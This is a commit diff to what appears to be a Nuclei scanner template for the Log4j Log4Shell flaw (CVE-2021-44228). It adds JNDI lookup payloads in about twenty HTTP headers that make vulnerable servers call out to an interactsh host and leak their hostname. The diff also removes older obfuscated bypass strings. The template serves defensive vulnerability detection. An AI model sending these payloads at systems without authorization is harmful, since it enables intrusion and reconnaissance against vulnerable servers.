Updated CVE-2021-44228 with most common vulnerable headers (#3334)

* Updated with common headers which can be exploited Reference : https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell These headers are collected from above blog in Detecting the Vulnerability part * fix: lint update * Update CVE-2021-44228.yaml * Update CVE-2021-44228.yaml * Updated changed matchers and extractors regex according to v8.7.3 update * payload updates for CVE-2021-44228 - more injection points - a fixed regex to extract uppercase hostnames - standardized payloads - printed injection points Source - https://twitter.com/0xceba/status/1471664540542648322 Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com> Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: 0xceba <44234156+0xceba@users.noreply.github.com>
2021-12-18 10:51:45 +05:30 · 2021-12-18 10:51:45 +05:30 · dd40419ea5
parent 09324d1be7
commit dd40419ea5
1 changed files with 27 additions and 7 deletions
--- a/cves/2021/CVE-2021-44228.yaml
+++ b/cves/2021/CVE-2021-44228.yaml
@ -2,7 +2,7 @@ id: CVE-2021-44228

 info:
  name: Remote code injection in Log4j
-  author: melbadry9,dhiyaneshDK,daffainfo
+  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba
  severity: critical
  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
@ -16,10 +16,24 @@ requests:
      - |
        GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
-        User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{interactsh-url}}}
-        Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
-        X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
-        Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
+        Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
+        Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
+        Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
+        Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
+        Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
+        Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
+        Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
+        Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
+        Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
+        Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
+        Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
+        Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
+        User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
+        X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
+        X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
+        X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
+        X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
+        X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}

    matchers-condition: and
    matchers:
@ -31,11 +45,17 @@ requests:
      - type: regex
        part: interactsh_request
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
+
      - type: regex
        part: interactsh_request
        group: 1
        regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output